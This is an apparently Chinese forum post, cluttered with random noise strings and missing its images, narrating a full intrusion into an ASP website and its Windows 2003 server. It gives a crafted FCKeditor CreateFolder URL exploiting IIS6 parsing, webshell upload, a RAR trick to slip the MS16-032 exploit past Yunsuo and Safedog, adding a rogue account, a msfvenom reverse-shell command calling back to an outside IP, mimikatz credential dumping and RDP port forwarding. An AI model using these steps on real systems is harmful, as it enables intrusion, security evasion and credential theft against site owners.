从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

admin

4 ]: Q1 s" Q% n8 ~. f3 B, z% o/ D2 f1 ^ @7 F8 {0 z8 E2 ^- P' o, _+ ~$ ]8 |" E

! ~3 b% A* [6 u- {7 ?1 u 一、 利用getwebshell篇 " L0 U# h0 p p, [首先对目标站进行扫描，发现是asp的，直接扫出网站后台和默认数据库，下载解密登陆如图： " D3 I5 I H6 G: X5 ~3 s* e6 t 7 M8 ^( l! T8 F [# { 下面进后台发现有fckeditor，而且还是iis6.0的，可以考虑创建个asp目录来构造解析（fck编辑器路径被改成别的需要burpsuite抓包的时候看到） ! {( ?8 G {1 ~- W6 V下面我们构造一个asp目录，如： http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 3 [! H) I) }5 s7 @; p. j2 C - r; C9 G7 s9 j 然后再给shell.asp目录上传一个jpg图片格式的一句话，然后用hatchet打开，然后看了一下支持aspx，那么我们就用包含的办法先把aspx后缀名改成.rar，然后再创建个111.ASPx，里面包含rar文件，进去以后看进程有云锁和安全狗，那么，那么我们慢慢来，慢慢来。 一、 绕过安全狗云锁提权并且加账号 2 R9 U0 W& w, h# q9 A + P' q4 F W! `& Q" H没法看系统信息，但是根据网站404页面可以断定是2003服务器，然后接着访问C:\Program Files (x86)存在断定是2003 64位系统，那么我们说干就干，我们上传ms16-032 64位直接干，但是发现上传exe或者别的格式exp会自动消失，看进程也没杀毒呀，没错没杀毒，是云锁有个功能防御了，那么突破云锁上传的方法就是利用rar，先把exp打包为64.rar上传，然后我们翻一下rar在哪个目录，在C:\Program Files (x86)，然后开干 2 _! Q9 A- e* R# ^ 如图： . ~* a) [/ C: q/ ~9 F0 s) d4 t 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组，我操后来也想着用getpassword64抓明文密码，但是一执行就卡死，没办法想到了metasploit ( o6 R+ l7 }, U8 N! R一、 利用metasploit ! c8 R. i3 z1 N. y) F首先用pentestbox生成一个64位的payload如下命令 0 C! Q9 J, t* P7 Y" h) C: ? * K2 F8 r7 T4 F' v- \( vmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe 为什么要用443端口，之前我测试用别的端口直接被墙了没法上线，下面我们在system下执行这个mata，上线如图： f( X' ~; R4 q! e 下面我们用这个命令抓一下明文密码命令1：use mimikatz 命令2：kerberos如下图： $ @4 X7 F% ]& ?) L) X# C, f: Q下面我们来做一个监听如下命令： & @. j; z' F& H. Q, Vportfwd add -l 6655 -p 3968 -r 127.0.0.1，这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图： * `0 [4 e2 T* x# @, Q1 r

/ f* t3 g0 H7 z2 K; [4 N

3 S9 Y* t# r7 r. I W8 z

" o, C: q( K% N8 K: V# Z

2 G9 B$ P* t8 N" ^0 g0 U
0 }7 H" D$ S7 E7 |7 S3 M( X

5 W/ z& d) {+ j% M- F7 n k

图片怎么都没了